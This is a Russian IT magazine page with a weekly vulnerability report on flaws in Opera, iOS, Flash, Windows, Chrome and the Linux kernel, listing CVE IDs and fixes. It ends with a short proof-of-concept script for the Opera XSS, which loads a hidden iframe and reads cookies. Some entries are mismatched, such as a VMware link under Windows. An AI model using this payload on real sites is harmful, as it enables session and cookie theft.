www.samag.ru
Журнал «БИТ. Бизнес&Информационные технологии»      
Поиск   
              
 www.samag.ru    Web  0 товаров , сумма 0 руб.
E-mail
Пароль  
 Запомнить меня
Регистрация | Забыли пароль?
Журнал "Системный администратор"
Журнал «БИТ»
Подписка
Архив номеров
Где купить
Авторам
Рекламодателям
Контакты
   

  Опросы
  Статьи

Интеграция Open Source-решений  

Open Source в облачной среде

Облачные решения становятся всё более популярными в мире. Компании стремятся использовать их для

 Читать далее...

Автоматизация  

Нейросеть вам в руки! Как использовать ИИ для автоматизации задач

Использование ИИ для автоматизации задач помогает компании получить конкурентное преимущество, поскольку объединение

 Читать далее...

Рынок труда  

Специалист по этическому ИИ, инженер по квантовым вычислениям или аналитик по метавселенной?

Новые тенденции в развитии ИТ могут привести к возникновению новых специальностей в

 Читать далее...

Книжная полка  

Учитесь убеждать и побеждать

Издательство «БХВ», как всегда, порадовало своих читателей хорошими книжными новинками. Кроме популярных

 Читать далее...

Сетевая инфраструктура  

Как удаленная работа меняет подход к сетевой инфраструктуре?

С увеличением числа сотрудников, работающих из дома, организации сталкиваются с необходимостью создания

 Читать далее...

Мониторинг  

Какой мониторинг нужен сегодня?

По мнению экспертов ГК InfoWatch, действия сотрудников – самая распространенная причина инцидентов

 Читать далее...

Книжная полка  

Руководство для тех, кто увлечен ИИ, программированием. И дизайном

Накануне лета издательство «БХВ» выпустило книжные новинки, от которых любителям чтения будет

 Читать далее...

Мобильные приложения  

Искусственный интеллект в мобильных приложениях: возможности и перспективы

Обзор современных применений ИИ в мобильных приложениях, анализ перспектив развития этой технологии,

 Читать далее...

ИТ-образование  

Как сделать ИТ-образование эффективным?

Эксперты ИТ-отрасли отвечают на вопросы «СА». Обсуждаем ключевые аспекты для улучшения образовательных

 Читать далее...

Work-life balance  

Как айтишнику найти баланс между работой и личной жизнью?

Обсуждаем инструменты для эффективного управления временем, снижения уровня стресса и достижения гармонии. На

 Читать далее...

Книжная полка  

Всё самое нужное – под одной обложкой

Отличительная черта книжных новинок, выпущенных недавно издательством «БХВ» – это их универсальность. Не просто

 Читать далее...

ИТ-инфраструктура  

Системы мониторинга ИТ-инфраструктуры-2025

Без мониторинга ИТ-инфраструктуры не обходится ни одна компания, хотя бы потому, что

 Читать далее...

Открытое ПО  

Безопасность Open Source: рискуем или контролируем?

Компания «Кросс технолоджис» изучила, как используется ПО с открытым кодом в компаниях

 Читать далее...

Работа с нейросетью  

Скажи, есть ли у тебя AI, и я скажу, кто ты

Недавно сервис по поиску работы SuperJob выяснил, что каждый второй россиянин уже

 Читать далее...

1001 и 1 книга  
19.03.2018г.
Просмотров: 9814
Комментарии: 0
Машинное обучение с использованием библиотеки Н2О

 Читать далее...

12.03.2018г.
Просмотров: 9950
Комментарии: 0
Особенности киберпреступлений в России: инструменты нападения и защита информации

 Читать далее...

12.03.2018г.
Просмотров: 7391
Комментарии: 0
Глубокое обучение с точки зрения практика

 Читать далее...

12.03.2018г.
Просмотров: 4607
Комментарии: 0
Изучаем pandas

 Читать далее...

12.03.2018г.
Просмотров: 5432
Комментарии: 0
Программирование на языке Rust (Цветное издание)

 Читать далее...

19.12.2017г.
Просмотров: 5403
Комментарии: 0
Глубокое обучение

 Читать далее...

19.12.2017г.
Просмотров: 8121
Комментарии: 0
Анализ социальных медиа на Python

 Читать далее...

19.12.2017г.
Просмотров: 4767
Комментарии: 0
Основы блокчейна

 Читать далее...

19.12.2017г.
Просмотров: 5013
Комментарии: 0
Java 9. Полный обзор нововведений

 Читать далее...

16.02.2017г.
Просмотров: 9088
Комментарии: 0
Опоздавших не бывает, или книга о стеке

 Читать далее...

17.05.2016г.
Просмотров: 12521
Комментарии: 0
Теория вычислений для программистов

 Читать далее...

30.03.2015г.
Просмотров: 14034
Комментарии: 0
От математики к обобщенному программированию

 Читать далее...

18.02.2014г.
Просмотров: 15790
Комментарии: 0
Рецензия на книгу «Читаем Тьюринга»

 Читать далее...

13.02.2014г.
Просмотров: 10659
Комментарии: 0
Читайте, размышляйте, действуйте

 Читать далее...

12.02.2014г.
Просмотров: 8685
Комментарии: 0
Рисуем наши мысли

 Читать далее...

10.02.2014г.
Просмотров: 6924
Комментарии: 4
Страна в цифрах

 Читать далее...

18.12.2013г.
Просмотров: 6037
Комментарии: 0
Большие данные меняют нашу жизнь

 Читать далее...

18.12.2013г.
Просмотров: 4959
Комментарии: 0
Компьютерные технологии – корень зла для точки роста

 Читать далее...

04.12.2013г.
Просмотров: 4606
Комментарии: 0
Паутина в облаках

 Читать далее...

03.12.2013г.
Просмотров: 4836
Комментарии: 1
Рецензия на книгу «MongoDB в действии»

 Читать далее...

Друзья сайта  

 Отчет по уязвимостям с 8 по 15 октября

Статьи / Отчет по уязвимостям с 8 по 15 октября

Автор: Андрей Бирюков

Еженедельный отчет содержит описания шести уязвимостей, в том числе и множественных в наиболее распространенных приложениях и операционных системах.

Отчет по уязвимостям с 8 по 15 октября

Еженедельный отчет содержит описания шести уязвимостей, в том числе и множественных в наиболее распространенных приложениях и операционных системах.

 

Opera  

В известном браузере Opera обнаружена уязвимость, которая позволяет удаленному пользователю произвести XSS нападение. Из-за недостаточной обработки data:URL, удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности произвольного сайта.

Пример эксплуатации уязвимости в конце статьи.

Ссылка на сайт разработчика:  https://rdot.org/forum/showthread.php?t=2444

  

Версии:  Opera 12.02 для Windows, Mac OS и Linux, возможно более ранние версии

Опасность: критическая

Операционные системы: 

ID в базе CVE:

Решение: Решения на настоящий момент не существует.

 

 Apple IOS

Обнаруженные уязвимости позволяют удаленному пользователю выполнить произвольный код на целевой системе. Всего обнаружены 32 уязвимости. Подробное описание уязвимостей можно найти в статье http://www.securitylab.ru/vulnerability/430961.php.    

Ссылка на сайт разработчика: 

http://support.apple.com/kb/HT5503

 Версии: Apple iOS 5.x для iPhone 3GS и более поздних версий
Apple iOS для iPad 5.x
Apple iOS для iPod touch 5.x.

 

Опасность: высокая

Операционные системы: 

ID в базе CVE: CVE-2011-1167
CVE-2011-1944
CVE-2011-2821
CVE-2011-2834
CVE-2011-2845
CVE-2011-3016
CVE-2011-3021
CVE-2011-3026
CVE-2011-3027
CVE-2011-3032
CVE-2011-3034
CVE-2011-3035
CVE-2011-3036
CVE-2011-3037
CVE-2011-3038
CVE-2011-3039
CVE-2011-3040
CVE-2011-3041
CVE-2011-3042
CVE-2011-3043
CVE-2011-3044
CVE-2011-3048
CVE-2011-3050
CVE-2011-3053
CVE-2011-3059
CVE-2011-3060
CVE-2011-3064
CVE-2011-3067
CVE-2011-3068
CVE-2011-3069
CVE-2011-3071
CVE-2011-3073
CVE-2011-3074
CVE-2011-3075
CVE-2011-3076
CVE-2011-3078
CVE-2011-3081
CVE-2011-3086
CVE-2011-3089
CVE-2011-3090
CVE-2011-3105
CVE-2011-3328
CVE-2011-3457
CVE-2011-3913
CVE-2011-3919
CVE-2011-3924
CVE-2011-3926
CVE-2011-3958
CVE-2011-3966
CVE-2011-3968
CVE-2011-3969
CVE-2011-3971
CVE-2011-4599
CVE-2012-0680
CVE-2012-0682
CVE-2012-0683
CVE-2012-1126
CVE-2012-1127
CVE-2012-1128
CVE-2012-1129
CVE-2012-1130
CVE-2012-1131
CVE-2012-1132
CVE-2012-1133
CVE-2012-1134
CVE-2012-1135
CVE-2012-1136
CVE-2012-1137
CVE-2012-1138
CVE-2012-1139
CVE-2012-1140
CVE-2012-1141
CVE-2012-1142
CVE-2012-1143
CVE-2012-1144
CVE-2012-1173
CVE-2012-1520
CVE-2012-1521
CVE-2012-2815
CVE-2012-2818
CVE-2012-3589
CVE-2012-3591
CVE-2012-3592
CVE-2012-3593
CVE-2012-3594
CVE-2012-3595
CVE-2012-3596
CVE-2012-3597
CVE-2012-3598
CVE-2012-3599
CVE-2012-3590
CVE-2012-3600
CVE-2012-3601
CVE-2012-3602
CVE-2012-3603
CVE-2012-3604
CVE-2012-3605
CVE-2012-3606
CVE-2012-3607
CVE-2012-3608
CVE-2012-3609
CVE-2012-3610
CVE-2012-3611
CVE-2012-3612
CVE-2012-3613
CVE-2012-3614
CVE-2012-3615
CVE-2012-3616
CVE-2012-3617
CVE-2012-3618
CVE-2012-3620
CVE-2012-3624
CVE-2012-3625
CVE-2012-3626
CVE-2012-3627
CVE-2012-3628
CVE-2012-3629
CVE-2012-3630
CVE-2012-3631
CVE-2012-3632
CVE-2012-3633
CVE-2012-3634
CVE-2012-3635
CVE-2012-3636
CVE-2012-3637
CVE-2012-3638
CVE-2012-3639
CVE-2012-3640
CVE-2012-3641
CVE-2012-3642
CVE-2012-3644
CVE-2012-3645
CVE-2012-3646
CVE-2012-3647
CVE-2012-3648
CVE-2012-3650
CVE-2012-3651
CVE-2012-3652
CVE-2012-3653
CVE-2012-3654
CVE-2012-3655
CVE-2012-3656
CVE-2012-3658
CVE-2012-3659
CVE-2012-3660
CVE-2012-3661
CVE-2012-3663
CVE-2012-3664
CVE-2012-3665
CVE-2012-3666
CVE-2012-3667
CVE-2012-3668
CVE-2012-3669
CVE-2012-3670
CVE-2012-3671
CVE-2012-3672
CVE-2012-3673
CVE-2012-3674
CVE-2012-3676
CVE-2012-3677
CVE-2012-3678
CVE-2012-3679
CVE-2012-3680
CVE-2012-3681
CVE-2012-3682
CVE-2012-3683
CVE-2012-3684
CVE-2012-3686
CVE-2012-3691
CVE-2012-3693
CVE-2012-3695
CVE-2012-3696
CVE-2012-3703
CVE-2012-3704
CVE-2012-3706
CVE-2012-3708
CVE-2012-3710
CVE-2012-3722
CVE-2012-3724
CVE-2012-3725
CVE-2012-3726
CVE-2012-3727
CVE-2012-3728
CVE-2012-3729
CVE-2012-3730
CVE-2012-3731
CVE-2012-3732
CVE-2012-3733
CVE-2012-3734
CVE-2012-3735
CVE-2012-3736
CVE-2012-3737
CVE-2012-3738
CVE-2012-3739
CVE-2012-3740
CVE-2012-3741
CVE-2012-3742
CVE-2012-3743
CVE-2012-3744
CVE-2012-3745
CVE-2012-3746
CVE-2012-3747

 

 

 

Решение: Для устранения уязвимостей установите обновление с сайта производителя

Adobe Flash Player

Обнаруженные уязвимости позволяют удаленному пользователю скомпрометировать целевую систему. Обнаружены множественные уязвимости в Adobe Flash Player и Adobe AIR, которые позволяют удаленному пользователю вызвать переполнение буфера или повреждение памяти и выполнить произвольный код на целевой системе. Подробности уязвимостей не сообщаются.

Ссылка на сайт разработчика:  

http://www.adobe.com/support/security/bulletins/apsb12-22.html    

Версии: Adobe Flash Player 11.4.402.278 для Windows, и более ранние версии
Adobe Flash Player 11.4.402.265 для Macintosh, и более ранние версии
Adobe Flash Player 11.2.202.238 для Linux, и более ранние версии
Adobe Flash Player 11.1.115.17 для Android 4.x, и более ранние версии
Adobe Flash Player 11.1.111.16 для Android 3.x и 2.x, и более ранние версии
Adobe AIR 3.4.0.2540 для Windows and Macintosh, и более ранние версии
Adobe AIR 3.4.0.2540 SDK, и более ранние версии
Adobe AIR 3.4.0.2540 для Android, и более ранние версии   

Опасность: критическая

Операционные системы: 

ID в базе CVE:  

CVE-2012-5248
CVE-2012-5249
CVE-2012-5250
CVE-2012-5251
CVE-2012-5253
CVE-2012-5254
CVE-2012-5255
CVE-2012-5257
CVE-2012-5259
CVE-2012-5260
CVE-2012-5262
CVE-2012-5264
CVE-2012-5265
CVE-2012-5266
CVE-2012-5252
CVE-2012-5256
CVE-2012-5258
CVE-2012-5261
CVE-2012-5263
CVE-2012-5267
CVE-2012-5268
CVE-2012-5269
CVE-2012-5270
CVE-2012-5271
CVE-2012-5272

Решение: Установить обновления с сайта производителя.

 

Microsoft Windows

В операционной системе Windows из-за того, что служба IKE and AuthIP IPsec Keying Modules пытается подключить несуществующую на системе библиотеку wlbsctrl.dll, локальный пользователь может поместить вредоносный файл с одноименным названием в поисковый путь по умолчанию и повысить свои привилегии на системе. Для успешной эксплуатации уязвимости на системе должен быть установлен ActivePerl в конфигурации по умолчанию или любое другое приложение, которое устанавливается в корневую директорию диска C и дописывает путь к установочной директории в системную переменную окружения PATH.

 

Ссылки на сайт разработчика: 

https://www.vmware.com/support/pubs/vcops-advanced-pubs.html  

 

Версии: Microsoft Windows Vista
Microsoft Windows 2008
Microsoft Windows 7

 

Опасность: критическая

Операционные системы: Microsoft Windows Vista
Microsoft Windows 2008
Microsoft Windows 7

 

ID в базе CVE: 

CVE-2012-5377
CVE-2012-5378
CVE-2012-5379
CVE-2012-5380
CVE-2012-5381
CVE-2012-5382
CVE-2012-5383

 

Решение: В настоящее время исправления не существует.  

 

Google Chrome

По еженедельной традиции в браузере Google Chrome обнаружены множественные уязвимости, которые позволяют удаленному пользователю выполнить произвольный код на целевой системе.

 

1. Обнаружены множественные уязвимости в Adobe Flash Player, входящем в состав Google Chrome. Удаленный пользователь может скомпрометировать целевую систему. Подробное описание уязвимостей: http://www.securitylab.ru/vulnerability/431016.php

 

2. Уязвимость существует из-за ошибки, относящейся к рендерингу Skia-текста. Удаленный пользователь может выполнить произвольный код на целевой системе.

 

3. Уязвимость существует из-за ошибки состояния операции при обработке аудио устройств. Удаленный пользователь может выполнить произвольный код на целевой системе.

 

4. Уязвимость существует из-за ошибки, относящейся к обработке регулярных выражений ICU. Удаленный пользователь может спровоцировать чтение данных за пределами буфера и выполнить произвольный код на целевой системе.

 

5. Уязвимость существует из-за ошибки при обработке compositor. Удаленный пользователь может спровоцировать чтение данных за пределами буфера и выполнить произвольный код на целевой системе.

 

6. Уязвимость существует из-за ошибки, относящейся к механизму наблюдения за отказами в обслуживании Pepper плагинов. Удаленный пользователь может выполнить произвольный код на целевой системе.

Ссылки на сайт разработчика:    

http://googlechromereleases.blogspot.dk/2012/10/stable-channel-update.html

Версии:  

 

Опасность: высокая

Операционные системы: 

 

ID в базе CVE: CVE-2012-5248
CVE-2012-5249
CVE-2012-5250
CVE-2012-5251
CVE-2012-5253
CVE-2012-5254
CVE-2012-5255
CVE-2012-5257
CVE-2012-5259
CVE-2012-5260
CVE-2012-5262
CVE-2012-5264
CVE-2012-5265
CVE-2012-5266
CVE-2012-5252
CVE-2012-5256
CVE-2012-5258
CVE-2012-5261
CVE-2012-5263
CVE-2012-5267
CVE-2012-5268
CVE-2012-5269
CVE-2012-5270
CVE-2012-5271
CVE-2012-5272
CVE-2012-2900
CVE-2012-5108
CVE-2012-5109
CVE-2012-5110
CVE-2012-5111

Решение: Установить соответствующее обновление с сайта производителя  

 

Linux Kernel

Уязвимость позволяет локальному пользователю повысить свои привилегии на системе.

Уязвимость существует из-за ошибки проверки границ данных в функции "hfs_bnode_read()" в файле fs/hfs/bnode.c. Локальный пользователь может вызвать переполнение буфера и повысить свои привилегии.

Ссылки на сайт разработчика:    

http://www.kernel.org/pub/linux/kernel/v2.6/longterm/v2.6.32/ChangeLog-2.6.32.60

Версии: Linux Kernel версии до 2.6.32.60

 

Опасность: высокая

Операционные системы: 

 

ID в базе CVE:

Решение: Установить соответствующее обновление с сайта производителя  

 

 

Эксплоит для уязвимость в браузере Opera

 

PHP код для чтения cookie:

 

<script>

if(document.domain == 'tinyurl.com')

    location.reload();

 

function xss()

{

    alert(document.frames[0].document.cookie);

}

 

function ifrAdd()

{

    var ifr = document.createElement('iframe');

    ifr.style = 'width:0px;height:0px;visibility:hidden';

    ifr.src = 'http';

    ifr.src += document.referrer.length ? '' : 's';

    ifr.src += '://forum.antichat.ru/css/a.css';

    ifr.onload = function(){xss()};

    document.body.appendChild(ifr);

}

 

</script>

<body onload=ifrAdd()> 

 

Использованные источники:

  1. Securitytracker.com
  2. Securitylab.ru

 

 

 

 

 

Комментарии отсутствуют

               Copyright © Системный администратор

Яндекс.Метрика
Tel.: (499) 277-12-45
E-mail: sa@samag.ru